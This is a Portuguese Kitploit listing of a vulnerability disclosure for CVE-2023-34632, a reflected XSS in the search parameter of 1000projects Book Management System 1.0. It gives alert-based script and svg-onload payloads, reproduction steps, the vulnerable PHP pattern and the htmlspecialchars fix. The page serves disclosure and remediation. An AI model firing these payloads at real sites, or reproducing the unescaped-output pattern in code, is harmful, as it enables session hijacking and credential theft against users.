Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-34632 — XSS Refletido no 1000projects Book Management System 1.0 | Kitploit
Ferramentas/GitHubGitHub/ssophiz/cve-2023-34632
Análise de VulnerabilidadesExploração de Aplicações WebSegurança WebPapers e PesquisaAprendizado e Educação
GitHubssophiz/cve-2023-34632

CVE-2023-34632

XSS Refletido no 1000projects Book Management System 1.0

Ver Repositório
há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-34632

XSS Refletido no 1000projects Book Management System 1.0

image

CVE-2023-34632

Cross-Site Scripting (XSS) Refletido no 1000projects Book Management System 1.0


Descrição

Uma vulnerabilidade de Cross-Site Scripting (XSS) Refletido foi descoberta no 1000projects Book Management System versão 1.0. A vulnerabilidade existe na funcionalidade de busca (index.php), onde a entrada fornecida pelo usuário através do parâmetro search é refletida na resposta HTTP sem sanitização adequada ou codificação de saída.

Um invasor pode criar uma URL maliciosa contendo código JavaScript. Quando uma vítima clica no link, o script é executado no contexto da sessão do navegador da vítima, potencialmente levando a sequestro de sessão, roubo de credenciais ou ataques de phishing.


Produto Afetado

ItemDetalhe
Fornecedor1000projects
ProdutoBook Management System
Versão1.0
Componenteindex.php (funcionalidade de busca)
TecnologiaPHP / MySQL

Detalhes da Vulnerabilidade


Prova de Conceito

Payload

root@kitploit:~
http://localhost/book-management/index.php?search="><script>alert('CVE-2023-34632')</script>

Passos para Reproduzir

  1. Instale XAMPP/WAMP e implante o Book Management System 1.0 na raiz web
  2. Navegue até a aplicação em um navegador
  3. Insira o seguinte payload na caixa de busca (ou visite a URL maliciosa acima):
    root@kitploit:~
    "><script>alert('CVE-2023-34632')</script>
    
  4. Observe o popup de alerta JavaScript, confirmando a vulnerabilidade XSS

Captura de Tela

XSS PoC

Payloads Alternativos

root@kitploit:~
">
root@kitploit:~
"><svg/onload=alert('CVE-2023-34632')>

Causa Raiz

O valor do parâmetro search é incorporado diretamente na resposta HTML sem qualquer sanitização. O código PHP não aplica htmlspecialchars() ou codificação de saída equivalente antes de renderizar a entrada do usuário.

Padrão de Código Vulnerável

root@kitploit:~
// Vulnerável - entrada do usuário renderizada diretamente na saída HTML
$search = $_GET['search'];
echo "Search results for: " . $search;

Correção

Aplique a codificação de saída adequada a todas as entradas fornecidas pelo usuário antes de renderizar no contexto HTML:

root@kitploit:~
// Corrigido - codificação de saída adequada
$search = htmlspecialchars($_GET['search'], ENT_QUOTES, 'UTF-8');
echo "Search results for: " . $search;

Impacto

  • Sequestro de Sessão — O invasor pode roubar cookies de sessão via document.cookie
  • Roubo de Credenciais — Formulários de login falsos podem ser injetados para pescar credenciais do usuário
  • Distribuição de Malware — As vítimas podem ser redirecionadas para sites maliciosos
  • Desfiguração — O conteúdo da página pode ser manipulado no navegador da vítima

Cronograma

DataEvento
2023-06Vulnerabilidade descoberta
2023-06CVE-2023-34632 reservado pela MITRE
2026-02Divulgação pública

Crédito

Descobridor: Wonkyeom Kim (@ssophiz)


Referências

  • 1000projects Book Management System
  • CWE-79: Neutralização Incorreta da Entrada Durante a Geração da Página Web
  • OWASP - Cross-Site Scripting (XSS)
Baixar ferramenta
ItemDetalhe
ID CVECVE-2023-34632
TipoCWE-79: Neutralização Incorreta da Entrada Durante a Geração da Página Web (XSS Refletido)
Vetor de AtaqueRede
Complexidade do AtaqueBaixa
Privilégios NecessáriosNenhum
Interação do UsuárioNecessária (vítima clica na URL maliciosa)
Pontuação CVSS 3.16.1 (Médio)
Vetor CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N